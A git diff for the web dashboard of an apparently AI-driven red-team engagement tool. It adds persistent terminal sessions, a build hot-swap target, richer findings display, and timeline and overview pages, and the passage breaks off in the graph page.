diff --git a/Makefile b/Makefile index 5619b295..ef094ec4 100644 --- a/Makefile +++ b/Makefile @@ -39,7 +39,7 @@ export CLAUDE_CREDENTIALS_VOLUME ?= $(shell test -f $(HOME)/.claude/.credentials dogfood launcher smoke \ dev cli-dev web-dev infra \ quality quality-cli test test-local lint lint-fix \ - web-build web-lint web-migrate web-ee web-oss \ + web-build web-hotswap web-lint web-migrate web-ee web-oss \ status logs health clean \ node-install web-db-ensure \ benchmark recreate-litellm @@ -68,6 +68,7 @@ help: @echo "" @echo "Web dashboard (single checks):" @echo " make web-build Prisma generate + Next build" + @echo " make web-hotswap Build + inject into running container (~15s)" @echo " make web-lint ESLint" @echo " make web-migrate [NAME=] Prisma migrate dev" @echo " make web-ee / web-oss Toggle EE/OSS mode (dev-only)" @@ -196,6 +197,11 @@ quality: lint test-local quality-cli web-lint web-build web-build: node-install cd $(WEB_DIR) && npx prisma generate && npm run build +## Hot-swap web dashboard into running container (~15s vs ~5min docker build). +## Builds Next.js on host, injects via tar pipe, restarts container. 
+web-hotswap: node-install web-build + ./scripts/web-hotswap.sh --skip-build + web-lint: node-install cd $(WEB_DIR) && npx eslint src/ --max-warnings 0 diff --git a/benchmark/xbow-validation-benchmarks b/benchmark/xbow-validation-benchmarks index ec459276..d8e45518 160000 --- a/benchmark/xbow-validation-benchmarks +++ b/benchmark/xbow-validation-benchmarks @@ -1 +1 @@ -Subproject commit ec459276faaa9a116653afd52011983bf6b0c9aa +Subproject commit d8e455185c4cd4760f44aeecd75e1860b9606abb diff --git a/clients/web/.build-stamp b/clients/web/.build-stamp new file mode 100644 index 00000000..4afed455 --- /dev/null +++ b/clients/web/.build-stamp @@ -0,0 +1 @@ +1777825936 diff --git a/clients/web/next.config.ts b/clients/web/next.config.ts index b83b18d3..61ec2533 100644 --- a/clients/web/next.config.ts +++ b/clients/web/next.config.ts @@ -26,6 +26,13 @@ const nextConfig: NextConfig = { }, ], }, + // HTML pages: no cache so hotswap chunk name changes take effect immediately + { + source: "/:path((?!_next/static|_next/image|favicon.ico).*)", + headers: [ + { key: "Cache-Control", value: "no-cache, no-store, must-revalidate" }, + ], + }, ]; }, // Pin Turbopack workspace root to the monorepo root (where npm workspaces diff --git a/clients/web/server/terminal-server.ts b/clients/web/server/terminal-server.ts index 48c89d0b..45dae98d 100644 --- a/clients/web/server/terminal-server.ts +++ b/clients/web/server/terminal-server.ts @@ -2,16 +2,26 @@ /** * Terminal WebSocket Server — spawns Decepticon CLI in a PTY. * - * Creates a LangGraph thread on connection (if none exists) and shares it - * with both the CLI process (via env var) and the web client (via JSON message). - * This ensures both surfaces observe the same execution. + * Session-persistent architecture: + * PTY processes are keyed by engagement slug + agent ID and survive + * WebSocket disconnects. 
When the browser reconnects (tab refresh, + * network blip, hotswap), it reattaches to the SAME PTY — no new + * CLI banner, no lost state, no [Reconnecting...] spam. + * + * PTYs are only destroyed when: + * 1. The CLI process itself exits (user typed Ctrl+C, engagement finished) + * 2. No WebSocket reconnects within ORPHAN_TTL (60s) after disconnect + * 3. The terminal server shuts down (SIGTERM) * * Protocol (Server → Client): - * - JSON { type: "threadId", threadId: "..." } — thread ID for web to store - * - Raw text — PTY stdout/stderr for xterm.js + * - JSON { type: "threadId", threadId: "..." } + * - JSON { type: "pong" } + * - JSON { type: "reattached", scrollback: "..." } — sent on reattach with recent output + * - Raw text — PTY stdout/stderr * * Protocol (Client → Server): - * - JSON { type: "resize", cols, rows } — terminal resize + * - JSON { type: "resize", cols, rows } + * - JSON { type: "ping" } * - Raw text — stdin for PTY */ @@ -27,45 +37,95 @@ const PORT = parseInt(process.env.TERMINAL_PORT ?? "3003", 10); const WEB_PORT = process.env.WEB_PORT ?? "3000"; const CLI_PATH = resolve(__dirname, "../../cli/src/index.tsx"); const LANGGRAPH_API_URL = process.env.LANGGRAPH_API_URL ?? "http://localhost:2024"; +const ORPHAN_TTL = 60_000; // Kill orphaned PTYs after 60s with no WS +const SCROLLBACK_LIMIT = 50_000; // chars of recent output to buffer for reattach + const ALLOWED_ORIGINS = new Set( (process.env.TERMINAL_ALLOWED_ORIGINS ?? 
`http://localhost:${WEB_PORT},http://127.0.0.1:${WEB_PORT}`) .split(",") - .map((origin) => origin.trim()) + .map((o) => o.trim()) .filter(Boolean), ); const wss = new WebSocketServer({ port: PORT }); - console.log(`[terminal-server] Listening on ws://localhost:${PORT}`); -console.log(`[terminal-server] CLI path: ${CLI_PATH}`); -console.log(`[terminal-server] LangGraph API: ${LANGGRAPH_API_URL}`); + +// ── Session Pool ───────────────────────────────────────────────── + +interface Session { + key: string; + term: pty.IPty; + ws: WebSocket | null; // currently-attached WS (null = orphaned) + scrollback: string; // ring buffer of recent output + threadId: string; + orphanTimer: ReturnType | null; + dead: boolean; // PTY exited + exitCode: number | null; +} + +const sessions = new Map(); + +function sessionKey(slug: string, agentId: string): string { + return `${slug}:${agentId}`; +} + +function appendScrollback(session: Session, data: string): void { + session.scrollback += data; + if (session.scrollback.length > SCROLLBACK_LIMIT) { + session.scrollback = session.scrollback.slice(-SCROLLBACK_LIMIT); + } +} + +function destroySession(key: string): void { + const session = sessions.get(key); + if (!session) return; + if (session.orphanTimer) clearTimeout(session.orphanTimer); + if (!session.dead) { + try { session.term.kill(); } catch { /* already dead */ } + } + sessions.delete(key); + console.log(`[terminal-server] Session ${key} destroyed`); +} + +// ── Helpers ────────────────────────────────────────────────────── function isAllowedOrigin(origin: string | undefined): boolean { if (!origin) return false; + try { return ALLOWED_ORIGINS.has(new URL(origin).origin); } catch { return false; } +} + +async function createThread(engagementId: string, agentId: string): Promise { + const controller = new AbortController(); + const timer = setTimeout(() => controller.abort(), 10000); try { - return ALLOWED_ORIGINS.has(new URL(origin).origin); - } catch { - return false; + 
const res = await fetch(`${LANGGRAPH_API_URL}/threads`, { + method: "POST", + headers: { "Content-Type": "application/json" }, + body: JSON.stringify({ metadata: { engagement_id: engagementId, decepticon_assistant: agentId } }), + signal: controller.signal, + }); + if (!res.ok) throw new Error(`Thread create: ${res.status}`); + return ((await res.json()) as { thread_id: string }).thread_id; + } finally { + clearTimeout(timer); } } -/** Create a new LangGraph thread via the REST API. */ -async function createThread(engagementId: string, agentId: string): Promise { - const res = await fetch(`${LANGGRAPH_API_URL}/threads`, { - method: "POST", +function sendJson(ws: WebSocket, payload: Record): void { + if (ws.readyState === WebSocket.OPEN) ws.send(JSON.stringify(payload)); +} + +function persistThreadId(engagementId: string, threadId: string): void { + const webUrl = `http://localhost:${process.env.PORT ?? 3000}`; + fetch(`${webUrl}/api/engagements/${engagementId}`, { + method: "PATCH", headers: { "Content-Type": "application/json" }, - body: JSON.stringify({ - metadata: { - engagement_id: engagementId, - assistant_id: agentId, - }, - }), - }); - if (!res.ok) throw new Error(`Failed to create thread: ${res.status}`); - const data = await res.json() as { thread_id: string }; - return data.thread_id; + body: JSON.stringify({ threadId }), + }).catch(() => {}); } +// ── Connection Handler ─────────────────────────────────────────── + wss.on("connection", async (ws: WebSocket, req) => { if (!isAllowedOrigin(req.headers.origin)) { ws.close(1008, "Origin not allowed"); @@ -74,97 +134,214 @@ wss.on("connection", async (ws: WebSocket, req) => { const url = new URL(req.url ?? "/", `http://localhost:${PORT}`); const engagementId = url.searchParams.get("engagementId") ?? ""; - // engagementSlug is the folder name under ~/.decepticon/workspace/. 
- // It identifies the engagement directory the CLI will operate inside; - // engagementId is the DB record cuid passed to LangGraph thread metadata. const engagementSlug = url.searchParams.get("engagementSlug") ?? ""; const agentId = url.searchParams.get("agentId") ?? "soundwave"; - let threadId = url.searchParams.get("threadId") ?? ""; + if (!engagementSlug) { + ws.close(1008, "Missing engagementSlug"); + return; + } + + const key = sessionKey(engagementSlug, agentId); + let session = sessions.get(key); + + // ── Reattach to existing session ── + if (session && !session.dead) { + console.log(`[terminal-server] Reattaching WS to existing session: ${key} (pid=${session.term.pid})`); + + // Cancel orphan timer + if (session.orphanTimer) { + clearTimeout(session.orphanTimer); + session.orphanTimer = null; + } + + // Detach old WS if any + if (session.ws && session.ws !== ws && session.ws.readyState === WebSocket.OPEN) { + session.ws.close(1000, "Replaced by new connection"); + } + session.ws = ws; + + // Send threadId + if (session.threadId) sendJson(ws, { type: "threadId", threadId: session.threadId }); + + // Send scrollback so the client sees recent output without a full re-render + if (session.scrollback) { + sendJson(ws, { type: "reattached" }); + ws.send(session.scrollback); + } + + wireWsToSession(ws, session); + return; + } + + // ── Clean up dead session ── + if (session?.dead) { + destroySession(key); + session = undefined; + } + + // ── Create new session ── + let threadId = url.searchParams.get("threadId") ?? ""; if (!threadId) { try { threadId = await createThread(engagementId, agentId); - console.log(`[terminal-server] Created new thread: ${threadId}`); + console.log(`[terminal-server] Created thread: ${threadId}`); } catch (err) { - console.error(`[terminal-server] Failed to create thread:`, err); + const msg = err instanceof Error ? 
err.message : String(err); + console.error(`[terminal-server] Thread creation failed: ${msg}`); + sendJson(ws, { type: "error", message: `Thread creation failed: ${msg}` }); } } - - if (threadId && ws.readyState === WebSocket.OPEN) { - ws.send(JSON.stringify({ type: "threadId", threadId })); + if (threadId) { + sendJson(ws, { type: "threadId", threadId }); + if (engagementId) persistThreadId(engagementId, threadId); } - console.log( - `[terminal-server] Connection: engagement=${engagementId} slug=${engagementSlug} agent=${agentId} thread=${threadId}`, - ); - const env: Record = { ...process.env as Record, TERM: "xterm-256color", FORCE_COLOR: "1", - // Names align with the CLI's expectations (clients/cli/src/hooks/useAgent.ts): - // DECEPTICON_ASSISTANT_ID picks the LangGraph assistant; DECEPTICON_ENGAGEMENT - // is the folder slug used for system-level logging and the engagement_ready - // handoff. Internal Docker hostname for the LangGraph endpoint is forwarded - // explicitly so the CLI subprocess does not fall back to localhost. DECEPTICON_ASSISTANT_ID: agentId, DECEPTICON_ENGAGEMENT: engagementSlug, DECEPTICON_WORKSPACE_PATH: engagementSlug ? `/workspace/${engagementSlug}` : "/workspace", DECEPTICON_API_URL: LANGGRAPH_API_URL, }; - if (threadId) { - env.DECEPTICON_THREAD_ID = threadId; - } + if (threadId) env.DECEPTICON_THREAD_ID = threadId; - const term = pty.spawn("node", ["--import", "tsx/esm", CLI_PATH], { - name: "xterm-256color", - cols: 120, - rows: 30, - cwd: resolve(__dirname, "../.."), - env, - }); + let term: pty.IPty; + try { + term = pty.spawn("node", ["--import", "tsx/esm", CLI_PATH], { + name: "xterm-256color", + cols: 120, + rows: 30, + cwd: resolve(__dirname, "../.."), + env, + }); + console.log(`[terminal-server] PTY spawned: ${key} pid=${term.pid}`); + } catch (err) { + const msg = err instanceof Error ? 
err.message : String(err); + console.error(`[terminal-server] PTY spawn failed: ${msg}`); + if (ws.readyState === WebSocket.OPEN) { + ws.send(`\r\n\x1b[31m[Error: ${msg}]\x1b[0m\r\n`); + } + ws.close(1011, "PTY spawn failed"); + return; + } - console.log(`[terminal-server] PTY spawned: pid=${term.pid}`); + const newSession: Session = { + key, + term, + ws, + scrollback: "", + threadId, + orphanTimer: null, + dead: false, + exitCode: null, + }; + sessions.set(key, newSession); + // PTY → buffer + current WS term.onData((data: string) => { - if (ws.readyState === WebSocket.OPEN) { - ws.send(data); + appendScrollback(newSession, data); + if (newSession.ws?.readyState === WebSocket.OPEN) { + newSession.ws.send(data); } }); - term.onExit(({ exitCode }) => { - console.log(`[terminal-server] PTY exited: pid=${term.pid} code=${exitCode}`); - if (ws.readyState === WebSocket.OPEN) { - ws.send(`\r\n[Process exited with code ${exitCode}]\r\n`); - ws.close(); + // PTY exit + term.onExit(({ exitCode, signal }) => { + console.log(`[terminal-server] PTY exited: ${key} pid=${term.pid} code=${exitCode} signal=${signal}`); + newSession.dead = true; + newSession.exitCode = exitCode; + if (newSession.ws?.readyState === WebSocket.OPEN) { + if (exitCode === 0) { + newSession.ws.send(`\r\n\x1b[32m[Session completed]\x1b[0m\r\n`); + } else { + newSession.ws.send(`\r\n\x1b[33m[Process exited: code ${exitCode}${signal ? 
`, signal ${signal}` : ""}]\x1b[0m\r\n`); + } + newSession.ws.close(1000, "PTY exited"); } + // Don't destroy immediately — let reattach see the exit message + setTimeout(() => destroySession(key), 5000); }); + wireWsToSession(ws, newSession); +}); + +// ── Wire a WebSocket to a Session ──────────────────────────────── + +function wireWsToSession(ws: WebSocket, session: Session): void { + // Send initial resize + ws.once("message", () => {}); // absorb first resize if needed + ws.on("message", (raw: Buffer | string) => { const msg = raw.toString(); try { const parsed = JSON.parse(msg); + if (parsed.type === "ping") { + sendJson(ws, { type: "pong" }); + return; + } if (parsed.type === "resize" && parsed.cols && parsed.rows) { - term.resize(parsed.cols, parsed.rows); + try { + session.term.resize( + Math.max(1, Math.min(500, parsed.cols)), + Math.max(1, Math.min(200, parsed.rows)), + ); + } catch { /* PTY may have exited */ } return; } } catch { // Not JSON — raw stdin } - term.write(msg); + if (!session.dead) { + try { session.term.write(msg); } catch { /* PTY exited */ } + } }); ws.on("close", () => { - console.log(`[terminal-server] Connection closed, killing PTY pid=${term.pid}`); - term.kill(); + console.log(`[terminal-server] WS disconnected from session ${session.key}`); + if (session.ws === ws) { + session.ws = null; + // Don't kill PTY — start orphan timer instead + if (!session.dead) { + session.orphanTimer = setTimeout(() => { + if (!session.ws && !session.dead) { + console.log(`[terminal-server] Orphan TTL expired for ${session.key} — destroying`); + destroySession(session.key); + } + }, ORPHAN_TTL); + } + } }); ws.on("error", (err) => { - console.error(`[terminal-server] WebSocket error:`, err.message); - term.kill(); + console.error(`[terminal-server] WS error on ${session.key}: ${err.message}`); + // Don't kill PTY — let the close handler start orphan timer }); -}); +} + +// ── Server lifecycle ───────────────────────────────────────────── 
wss.on("error", (err) => { - console.error(`[terminal-server] Server error:`, err.message); + console.error(`[terminal-server] Server error: ${err.message}`); +}); + +function shutdown() { + console.log(`[terminal-server] Shutting down, destroying ${sessions.size} sessions...`); + for (const key of [...sessions.keys()]) destroySession(key); + wss.close(); + process.exit(0); +} + +process.on("SIGTERM", shutdown); +process.on("SIGINT", shutdown); + +process.on("uncaughtException", (err) => { + console.error(`[terminal-server] Uncaught: ${err.message}`); + console.error(err.stack); +}); + +process.on("unhandledRejection", (reason) => { + console.error(`[terminal-server] Unhandled rejection:`, reason); }); diff --git a/clients/web/src/app/(dashboard)/engagements/[id]/findings/page.tsx b/clients/web/src/app/(dashboard)/engagements/[id]/findings/page.tsx index e39189e0..2ed9f6ef 100644 --- a/clients/web/src/app/(dashboard)/engagements/[id]/findings/page.tsx +++ b/clients/web/src/app/(dashboard)/engagements/[id]/findings/page.tsx @@ -30,6 +30,11 @@ interface Finding { evidence: string; attackVector: string; affectedAssets: string[]; + cvssScore?: number; + cvssVector?: string; + cwe?: string[]; + mitre?: string[]; + remediation?: string; } const severityColors: Record = { @@ -105,7 +110,7 @@ export default function FindingsPage() {

{selectedFinding.title}

-
+
{selectedFinding.id} @@ -115,9 +120,27 @@ export default function FindingsPage() { > {selectedFinding.severity} + {selectedFinding.cvssScore != null && ( + + CVSS {selectedFinding.cvssScore.toFixed(1)} + + )} + {selectedFinding.cwe?.map((c) => ( + {c} + ))} + {selectedFinding.mitre?.map((m) => ( + {m} + ))}
+ {selectedFinding.cvssVector && ( +
+ CVSS Vector +

{selectedFinding.cvssVector}

+
+ )} +
@@ -171,6 +194,19 @@ export default function FindingsPage() { )} + + {selectedFinding.remediation && ( + + + Remediation + + +

+ {selectedFinding.remediation} +

+
+
+ )}
); @@ -222,6 +258,7 @@ export default function FindingsPage() { ID Title Severity + CVSS Assets @@ -246,6 +283,9 @@ export default function FindingsPage() { {finding.severity} + + {finding.cvssScore != null ? finding.cvssScore.toFixed(1) : "—"} + {finding.affectedAssets.length > 0 ? finding.affectedAssets.join(", ") diff --git a/clients/web/src/app/(dashboard)/engagements/[id]/layout.tsx b/clients/web/src/app/(dashboard)/engagements/[id]/layout.tsx index 851db22d..0ae95225 100644 --- a/clients/web/src/app/(dashboard)/engagements/[id]/layout.tsx +++ b/clients/web/src/app/(dashboard)/engagements/[id]/layout.tsx @@ -1,55 +1,96 @@ "use client"; -import { useEffect, useState } from "react"; -import { useParams } from "next/navigation"; -import { Skeleton } from "@/components/ui/skeleton"; +import { useState, useEffect } from "react"; +import { useParams, usePathname } from "next/navigation"; +import { EngagementProvider } from "@/lib/engagement-context"; +import { useRunObserver } from "@/hooks/useRunObserver"; +import { WebTerminal } from "@/components/terminal/web-terminal"; +import { cn } from "@/lib/utils"; -interface Engagement { - id: string; - name: string; +const REQUIRED_PLAN_DOCS = ["roe", "conops", "deconfliction"] as const; + +function pickAssistant(planDocs: Record): "soundwave" | "decepticon" { + for (const name of REQUIRED_PLAN_DOCS) { + if (planDocs[name] == null) return "soundwave"; + } + return "decepticon"; } -export default function EngagementLayout({ children }: { children: React.ReactNode }) { +export default function EngagementLayout({ + children, +}: { + children: React.ReactNode; +}) { const params = useParams(); - const id = params.id as string; - const [engagement, setEngagement] = useState(null); - const [loading, setLoading] = useState(true); + const pathname = usePathname(); + const engagementId = params.id as string; + const [engagement, setEngagement] = useState<{ name: string } | null>(null); + const [agentId, setAgentId] = 
useState<"soundwave" | "decepticon" | null>(null); + const [threadId, setThreadId] = useState(null); + + // Resolve engagement metadata — determines agentId and slug for WS useEffect(() => { - let active = true; - fetch(`/api/engagements/${id}`) - .then((res) => { - if (!res.ok) throw new Error("fetch failed"); - return res.json(); - }) - .then((data: Engagement) => { - if (!active) return; - setEngagement(data); - }) - .catch(() => { - if (!active) return; - setEngagement(null); - }) - .finally(() => { - if (!active) return; - setLoading(false); - }); - return () => { - active = false; + let cancelled = false; + const load = async () => { + try { + const [engRes, planRes] = await Promise.all([ + fetch(`/api/engagements/${engagementId}`), + fetch(`/api/engagements/${engagementId}/plan-docs`), + ]); + if (!engRes.ok) return; + const eng = (await engRes.json()) as { name: string }; + const planDocs = planRes.ok ? ((await planRes.json()) as Record) : {}; + if (cancelled) return; + setEngagement(eng); + setAgentId(pickAssistant(planDocs)); + } catch (err) { + console.error("[EngagementLayout] Failed to resolve engagement:", err); + } }; - }, [id]); + load(); + return () => { cancelled = true; }; + }, [engagementId]); - if (loading) { - return ( -
- -
- ); - } + // Persistent observer — survives tab navigation + const { events, isRunning, activeRunId } = useRunObserver({ threadId }); - if (!engagement) { - return
Engagement not found
; - } + const isLivePath = pathname.endsWith("/live"); - return <>{children}; + // Don't render terminal until we know the slug and assistant + const terminalReady = engagement != null && agentId != null; + + return ( + +
+
+ {children} +
+ {/* Terminal: always mounted, visibility controlled by route */} +
+ {terminalReady && ( + + )} +
+
+
+ ); } diff --git a/clients/web/src/app/(dashboard)/engagements/[id]/live/page.tsx b/clients/web/src/app/(dashboard)/engagements/[id]/live/page.tsx index 13e85c82..0d808a89 100644 --- a/clients/web/src/app/(dashboard)/engagements/[id]/live/page.tsx +++ b/clients/web/src/app/(dashboard)/engagements/[id]/live/page.tsx @@ -1,33 +1,14 @@ "use client"; -import { useState, useCallback, useEffect } from "react"; +import { useState, useCallback } from "react"; import { useParams } from "next/navigation"; import type { AgentConfig } from "@/lib/agents"; import { AgentGraphCanvas } from "@/components/agents/agent-graph-canvas"; -import { WebTerminal } from "@/components/terminal/web-terminal"; -import { useRunObserver } from "@/hooks/useRunObserver"; +import { useEngagementContext } from "@/lib/engagement-context"; import { useAgents } from "@/hooks/useAgents"; - -interface EngagementMeta { - name: string; -} - -const REQUIRED_PLAN_DOCS = ["roe", "conops", "deconfliction"] as const; - -/** Decide which assistant the CLI should connect to. - * - * The launcher's engagement.Select makes the same choice for the CLI: an - * engagement with all three planning docs is "ready" and routes to - * decepticon; anything missing means soundwave still has an interview to - * run. plan-docs is the source of truth — engagement.status drifts when - * the operator switches between web and CLI. 
- */ -function pickAssistant(planDocs: Record): "soundwave" | "decepticon" { - for (const name of REQUIRED_PLAN_DOCS) { - if (planDocs[name] == null) return "soundwave"; - } - return "decepticon"; -} +import { LiveActivityFeed } from "@/components/streaming/live-activity-feed"; +import { OpplanLiveOverlay } from "@/components/streaming/opplan-live-overlay"; +import { AgentDetailPanel } from "@/components/streaming/agent-detail-panel"; export default function LivePage() { const params = useParams(); @@ -35,40 +16,10 @@ export default function LivePage() { const { agents } = useAgents(); const [selectedAgent, setSelectedAgent] = useState(null); - const [threadId, setThreadId] = useState(null); - const [engagement, setEngagement] = useState(null); - const [agentId, setAgentId] = useState<"soundwave" | "decepticon" | null>(null); - - // Resolve the slug + assistant before mounting the terminal. Mounting it - // earlier would spawn the PTY with wrong env (defaulting to soundwave with - // an empty slug), forcing a reconnect once the data lands. - useEffect(() => { - let cancelled = false; - const load = async () => { - try { - const [engRes, planRes] = await Promise.all([ - fetch(`/api/engagements/${engagementId}`), - fetch(`/api/engagements/${engagementId}/plan-docs`), - ]); - if (!engRes.ok) return; - const eng = (await engRes.json()) as EngagementMeta; - const planDocs = planRes.ok ? ((await planRes.json()) as Record) : {}; - if (cancelled) return; - setEngagement(eng); - setAgentId(pickAssistant(planDocs)); - } catch (err) { - console.error("[LivePage] Failed to resolve engagement:", err); - } - }; - load(); - return () => { cancelled = true; }; - }, [engagementId]); - - const { events } = useRunObserver({ threadId }); - const handleThreadId = useCallback((tid: string) => { - setThreadId(tid); - }, []); + // Observer + terminal are managed by the engagement layout — they persist + // across tab switches so events and PTY connection survive navigation. 
+ const { events } = useEngagementContext(); function handleAgentClick(agent: AgentConfig) { setSelectedAgent( @@ -78,32 +29,35 @@ export default function LivePage() { return (
- {/* Left: Agent Execution Graph */} -
+ {/* Left: Activity Feed */} +
+ + {selectedAgent && ( +
+ setSelectedAgent(null)} + /> +
+ )} +
+ + {/* Center: Agent Execution Graph + OPPLAN overlay */} +
+
+ +
- {/* Right: CLI Terminal */} -
- {engagement && agentId ? ( - - ) : ( -
- Loading engagement… -
- )} -
+ {/* Right column (terminal) is rendered by the engagement layout. + It persists across tab switches — no more reset on navigation. */}
); } diff --git a/clients/web/src/app/(dashboard)/engagements/[id]/page.tsx b/clients/web/src/app/(dashboard)/engagements/[id]/page.tsx index 42abc649..68e45265 100644 --- a/clients/web/src/app/(dashboard)/engagements/[id]/page.tsx +++ b/clients/web/src/app/(dashboard)/engagements/[id]/page.tsx @@ -4,78 +4,137 @@ import { useEffect, useState } from "react"; import { useParams, useRouter } from "next/navigation"; import Link from "next/link"; import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card"; -import { FileWarning, Network, Play, ArrowRight, ClipboardList, Loader2 } from "lucide-react"; - -const quickStats = [ - { - label: "Objectives", - value: 0, - subValue: "0 completed", - icon: ClipboardList, - href: "plan", - color: "text-emerald-400", - }, - { - label: "Findings", - value: 0, - subValue: "0 critical", - icon: FileWarning, - href: "findings", - color: "text-red-400", - }, -]; +import { Badge } from "@/components/ui/badge"; +import { Skeleton } from "@/components/ui/skeleton"; +import { FileWarning, Network, Play, ArrowRight, ClipboardList, Loader2, Download, Clock } from "lucide-react"; + +interface Objective { + id: string; + title: string; + status: string; + phase: string; +} + +interface Finding { + id: string; + title: string; + severity: string; +} + +const severityBadge: Record = { + critical: "bg-red-500/20 text-red-300", + high: "bg-orange-500/20 text-orange-300", + medium: "bg-yellow-500/20 text-yellow-300", + low: "bg-blue-500/20 text-blue-300", + informational: "bg-slate-500/20 text-slate-300", +}; export default function EngagementOverviewPage() { const params = useParams(); const router = useRouter(); const id = params.id as string; const [loading, setLoading] = useState(true); + const [objectives, setObjectives] = useState([]); + const [findings, setFindings] = useState([]); + const [graphNodeCount, setGraphNodeCount] = useState(0); - // Check if engagement has documents — if not, redirect to Live for Soundwave 
interview useEffect(() => { let active = true; - async function checkDocs() { + async function load() { try { - const res = await fetch(`/api/engagements/${id}/opplan`); + // Check if opplan exists first + const opplanRes = await fetch(`/api/engagements/${id}/opplan`); if (!active) return; - if (!res.ok) { + if (!opplanRes.ok) { router.replace(`/engagements/${id}/live?new=true`); return; } - const data = await res.json(); + const opplanData = await opplanRes.json(); if (!active) return; - // If opplan has no objectives, documents haven't been created yet - if (!data.objectives || data.objectives.length === 0) { + const objs: Objective[] = opplanData.objectives ?? []; + if (objs.length === 0) { router.replace(`/engagements/${id}/live?new=true`); return; } - } catch { + setObjectives(objs); + + // Fetch findings and graph in parallel + const [findingsRes, graphRes] = await Promise.all([ + fetch(`/api/engagements/${id}/findings`).catch(() => null), + fetch(`/api/engagements/${id}/graph`).catch(() => null), + ]); + if (!active) return; - router.replace(`/engagements/${id}/live?new=true`); + + if (findingsRes?.ok) { + const f: Finding[] = await findingsRes.json(); + setFindings(f); + } + + if (graphRes?.ok) { + const g = await graphRes.json(); + setGraphNodeCount(g.nodes?.length ?? 0); + } + } catch { + if (active) router.replace(`/engagements/${id}/live?new=true`); return; } - if (!active) return; - setLoading(false); + if (active) setLoading(false); } - checkDocs(); - return () => { - active = false; - }; + load(); + return () => { active = false; }; }, [id, router]); if (loading) { return ( -
- +
+
+ {[1, 2, 3, 4].map((i) => ( + + ))} +
); } + const completedCount = objectives.filter((o) => o.status === "completed").length; + const blockedCount = objectives.filter((o) => o.status === "blocked").length; + const totalObj = objectives.length; + const progress = totalObj > 0 ? Math.round(((completedCount + blockedCount) / totalObj) * 100) : 0; + const criticalFindings = findings.filter((f) => f.severity === "critical").length; + + const stats = [ + { + label: "Objectives", + value: totalObj, + subValue: `${completedCount} completed`, + icon: ClipboardList, + href: "plan", + color: "text-emerald-400", + }, + { + label: "Findings", + value: findings.length, + subValue: `${criticalFindings} critical`, + icon: FileWarning, + href: "findings", + color: "text-red-400", + }, + { + label: "Attack Graph", + value: graphNodeCount, + subValue: "nodes discovered", + icon: Network, + href: "graph", + color: "text-cyan-400", + }, + ]; + return (
{/* Stats grid */}
- {quickStats.map((stat) => ( + {stats.map((stat) => ( @@ -97,26 +156,7 @@ export default function EngagementOverviewPage() { ))} - - - - - Attack Graph - - - - -
-
- 0 -

nodes discovered

-
- -
-
-
- - + {/* Progress card */} @@ -126,25 +166,64 @@ export default function EngagementOverviewPage() {
- 0% + {progress}%
-
+
-

Run engagement to see data

+

+ {completedCount}/{totalObj} objectives resolved +

- {/* Recent activity */} + {/* Quick actions */} + + + {/* Recent findings */} - + Recent Findings + {findings.length > 0 && ( + + View all + + )} -
- Run engagement to see data -
+ {findings.length === 0 ? ( +
+ No findings yet — run the engagement to discover vulnerabilities +
+ ) : ( +
+ {findings.slice(-5).reverse().map((f) => ( +
+
+ {f.title} + {f.id} +
+ + {f.severity} + +
+ ))} +
+ )}
diff --git a/clients/web/src/app/(dashboard)/engagements/[id]/timeline/page.tsx b/clients/web/src/app/(dashboard)/engagements/[id]/timeline/page.tsx new file mode 100644 index 00000000..77d02152 --- /dev/null +++ b/clients/web/src/app/(dashboard)/engagements/[id]/timeline/page.tsx @@ -0,0 +1,113 @@ +"use client"; + +import { useEffect, useState } from "react"; +import { useParams } from "next/navigation"; +import { Card, CardContent, CardHeader, CardTitle } from "@/components/ui/card"; +import { Badge } from "@/components/ui/badge"; +import { Skeleton } from "@/components/ui/skeleton"; +import { ScrollArea } from "@/components/ui/scroll-area"; +import { ClipboardList, FileWarning, FolderOpen, Clock, Loader2, Download } from "lucide-react"; +import { cn } from "@/lib/utils"; + +interface TimelineEvent { + timestamp: string; + type: "plan_created" | "objective_changed" | "finding_discovered" | "file_created"; + title: string; + detail: string; + severity?: string; +} + +const typeConfig: Record = { + plan_created: { icon: ClipboardList, color: "text-violet-400", bg: "bg-violet-500/10" }, + objective_changed: { icon: ClipboardList, color: "text-amber-400", bg: "bg-amber-500/10" }, + finding_discovered: { icon: FileWarning, color: "text-red-400", bg: "bg-red-500/10" }, + file_created: { icon: FolderOpen, color: "text-cyan-400", bg: "bg-cyan-500/10" }, +}; + +const sevColor: Record = { + critical: "bg-red-500/20 text-red-300", + high: "bg-orange-500/20 text-orange-300", + medium: "bg-yellow-500/20 text-yellow-300", + low: "bg-blue-500/20 text-blue-300", +}; + +export default function TimelinePage() { + const params = useParams(); + const id = params.id as string; + const [events, setEvents] = useState([]); + const [loading, setLoading] = useState(true); + + useEffect(() => { + fetch(`/api/engagements/${id}/timeline`) + .then((r) => r.json()) + .then((data) => setEvents(data)) + .catch(() => {}) + .finally(() => setLoading(false)); + }, [id]); + + if (loading) { + return 
( +
+ + {[1, 2, 3, 4].map((i) => )} +
+ ); + } + + return ( +
+
+
+

Timeline

+

{events.length} events

+
+ + Export JSON + +
+ + + + +
+ {events.length === 0 ? ( +
+ No activity recorded yet +
+ ) : ( + events.map((event, i) => { + const cfg = typeConfig[event.type] ?? typeConfig.file_created; + const Icon = cfg.icon; + return ( +
+
+ +
+
+
+ {event.title} + {event.severity && ( + + {event.severity} + + )} +
+

{event.detail}

+
+ +
+ ); + }) + )} +
+
+
+
+
+ ); +} diff --git a/clients/web/src/app/(dashboard)/graph/page.tsx b/clients/web/src/app/(dashboard)/graph/page.tsx index b51a87a6..d34bd77c 100644 --- a/clients/web/src/app/(dashboard)/graph/page.tsx +++ b/clients/web/src/app/(dashboard)/graph/page.tsx @@ -1,56 +1,76 @@ "use client"; -import { useState } from "react"; -import { Input } from "@/components/ui/input"; -import { Label } from "@/components/ui/label"; -import { Button } from "@/components/ui/button"; +import { useState, useEffect } from "react"; import { Card, CardContent } from "@/components/ui/card"; -import { Network } from "lucide-react"; +import { Network, Loader2 } from "lucide-react"; import { AttackGraphCanvas } from "@/components/graph/attack-graph-canvas"; +interface Engagement { + id: string; + name: string; + status: string; +} + export default function GraphPage() { - const [engagementId, setEngagementId] = useState(""); - const [activeId, setActiveId] = useState(null); + const [engagements, setEngagements] = useState([]); + const [selectedId, setSelectedId] = useState(null); + const [loading, setLoading] = useState(true); - return ( -
-
-

Attack Graph

-

- Visualize attack paths and knowledge graph from Neo4j -

